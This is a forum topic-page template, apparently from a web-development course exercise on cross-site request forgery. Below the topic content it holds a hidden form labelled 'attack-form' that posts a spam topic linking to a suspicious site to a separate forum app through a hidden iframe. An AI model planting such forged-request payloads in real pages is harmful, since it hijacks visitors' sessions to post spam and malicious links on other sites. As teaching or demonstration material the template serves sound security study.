{% extends "base.html" %}

{% block title %}{{ topic.title }}{% endblock title %}

{% block content %}
<div class="row">
  <div class="col-md-6 col-md-offset-3">
    <div class="panel panel-primary">
      <div class="panel-heading">
        <h3 class="panel-title">{{ topic.title }}</h3>
      </div>

      <div class="panel-body">
        <p><strong>Author:</strong>&nbsp;{{ topic.author_email }}</p>

        <p>{{ topic.content }}</p>
      </div>
    </div>
  </div>
</div>

<form action="https://ninja-tech-forum-wd2.appspot.com/topic/add" method="post" target="hidden-frame" name="attack-form" class="js-attack-form">
  <input name="title" value="FREE MONEY HERE" type="hidden">

  <textarea name="text" style="display:none;">
            <a href="http://dangerous-website.ru">Click on this link to get free money</a>
        </textarea>
</form>

<iframe name="hidden-frame" style="display: none;"></iframe>

{% endblock content %}